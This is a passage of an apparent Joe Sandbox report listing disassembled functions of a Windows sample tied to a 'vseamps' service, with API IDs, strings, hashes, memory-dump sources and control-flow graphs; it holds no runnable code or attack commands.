                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                  • Instruction ID: df331209a9c2bac8a3253438dec6de374fb007abf8271c7ad2a000f1697e5e95
                                  • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                  • Instruction Fuzzy Hash: 8A819EE9F0E64346FB94AF75D44127B2390AF46780F44A475EA4DB7B92EE3CE8458E00
                                  Function 00007FFBC1BA1720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                  • String ID: WordpadFilter.db
                                  • API String ID: 868324331-3647581008
                                  • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                  • Instruction ID: 499664675e561f705db1643c849e155e848709e424c5061f75918aed4bc41ac7
                                  • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                  • Instruction Fuzzy Hash: 1E31AC76B16B4189E740CFB1D8502AE73B5EB89788F449635EE8C23B04EF38D192C740
                                  Function 00007FFBC1BA11B0 Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 196 7ffbc1ba11b0-7ffbc1ba1207 197 7ffbc1ba1209-7ffbc1ba1222 call 7ffbc1bb1490 196->197 198 7ffbc1ba124b-7ffbc1ba124e 196->198 210 7ffbc1ba1224-7ffbc1ba1227 197->210 211 7ffbc1ba123e 197->211 199 7ffbc1ba1254-7ffbc1ba1280 198->199 200 7ffbc1ba14b8-7ffbc1ba14bf 198->200 202 7ffbc1ba12f6-7ffbc1ba1335 call 7ffbc1ba1b90 call 7ffbc1bb0a50 199->202 203 7ffbc1ba1282-7ffbc1ba128f 199->203 204 7ffbc1ba14c3-7ffbc1ba14ea call 7ffbc1ba1b70 200->204 231 7ffbc1ba1340-7ffbc1ba13cb 202->231 207 7ffbc1ba1295-7ffbc1ba129c 203->207 208 7ffbc1ba14f1-7ffbc1ba14f6 call 7ffbc1ba1a40 203->208 215 7ffbc1ba12c7-7ffbc1ba12cf call 7ffbc1ba1b90 207->215 216 7ffbc1ba129e-7ffbc1ba12a5 207->216 221 7ffbc1ba14f7-7ffbc1ba14ff call 7ffbc1ba1110 208->221 213 7ffbc1ba1241-7ffbc1ba1246 210->213 218 7ffbc1ba1229-7ffbc1ba123c call 7ffbc1bb1490 210->218 211->213 213->198 233 7ffbc1ba12d2-7ffbc1ba12f1 call 7ffbc1bb0e10 215->233 216->221 222 7ffbc1ba12ab-7ffbc1ba12b3 call 7ffbc1ba1b90 216->222 218->210 218->211 236 7ffbc1ba12b9-7ffbc1ba12c5 222->236 237 7ffbc1ba14eb-7ffbc1ba14f0 call 7ffbc1ba79cc 222->237 231->231 235 7ffbc1ba13d1-7ffbc1ba13da 231->235 233->202 239 7ffbc1ba13e0-7ffbc1ba1402 235->239 236->233 237->208 241 7ffbc1ba1404-7ffbc1ba140e 239->241 242 7ffbc1ba1411-7ffbc1ba142c 239->242 241->242 242->239 244 7ffbc1ba142e-7ffbc1ba1436 242->244 245 7ffbc1ba1498-7ffbc1ba14a6 244->245 246 7ffbc1ba1438-7ffbc1ba143b 244->246 247 7ffbc1ba14b6 245->247 248 7ffbc1ba14a8-7ffbc1ba14b5 call 7ffbc1ba1bcc 245->248 249 7ffbc1ba1440-7ffbc1ba1449 246->249 247->204 248->247 251 7ffbc1ba1455-7ffbc1ba1465 249->251 252 7ffbc1ba144b-7ffbc1ba1453 249->252 253 7ffbc1ba1467-7ffbc1ba146e 251->253 254 7ffbc1ba1470-7ffbc1ba1496 251->254 252->251 253->254 254->245 254->249
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 73155330-0
                                  • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                  • Instruction ID: f7ddcc1b4e6e24180819d165e06d4786e210984f327d2f4bc3191454cccebfa3
                                  • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                  • Instruction Fuzzy Hash: 36812666B1A78245E7518F35D8401BAA794EF57BC4F149335EA9D73B82DF3CE0928B00
                                  Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 274 140007341-1400073de 264->274 275 14000756c-1400075a2 264->275 270 1400074b4 265->270 271 140007480-1400074b3 265->271 267 1400074eb-14000752b 266->267 268 14000752c-140007535 266->268 267->268 272 140007552 268->272 273 140007537-140007554 268->273 270->268 271->270 272->260 273->264 274->256 275->260
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                  • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                  • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                  • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                  Non-executed Functions

                                  Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                  • String ID:
                                  • API String ID: 3526400053-0
                                  • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                  • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                  • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                  • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                  Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                  • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                  • API String ID: 3408796845-4213300970
                                  • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                  • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                  • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                  • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                  Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                  • String ID: ampStopSingletone: logging ended
                                  • API String ID: 2048888615-3533855269
                                  • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                  • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                  • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                  • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                  Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ErrorLastManagerOpen$FileModuleName
                                  • String ID: /remove$/service$vseamps
                                  • API String ID: 67513587-3839141145
                                  • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                  • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                  • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                  • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                  Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                  • String ID:
                                  • API String ID: 4284112124-0
                                  • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                  • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                  • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                  • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                  Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                  • String ID: vseamps
                                  • API String ID: 3693165506-3944098904
                                  • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                  • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                  • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                  • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                  Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: FileModuleName
                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                  • API String ID: 514040917-4022980321
                                  • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                  • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                  • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                  • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                  Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                  • String ID:
                                  • API String ID: 2057259594-0
                                  • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                  • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                  • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                  • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                  Function 00007FFBC1BA2630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                  • String ID:
                                  • API String ID: 3140674995-0
                                  • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                  • Instruction ID: 3acfe1979e7d7e1f5b4555da643ce0a41fcf3091797f7ee2c0410dc528fa3366
                                  • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                  • Instruction Fuzzy Hash: 7E314DB6609F8186EB608F74E8403EE7361FB88744F44543ADA4E57B94DF38D648CB10
                                  Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                  • String ID:
                                  • API String ID: 1269745586-0
                                  • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                  • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                  • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                  • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                  Function 00007FFBC1BA76E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                  • String ID:
                                  • API String ID: 1239891234-0
                                  • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                  • Instruction ID: 1f72406ae0be3f8a0d6797784de628779ca185b3c5b7caacac150e87a2f3221e
                                  • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                  • Instruction Fuzzy Hash: 86318E7AA19F8186DB60CF35E8402AE33A1FB88758F945536EA8D53B95DF3CD145CB00
                                  Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239timeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 355 140003d35-140003d49 353->355 356 1400039f3-140003a04 #4 354->356 357 140003a09-140003a1a EnterCriticalSection 354->357 356->357 358 140003a67 357->358 359 140003a1c-140003a34 357->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->355
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                  • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                  • API String ID: 1021822269-3147033232
                                  • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                  • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                  • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                  • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350
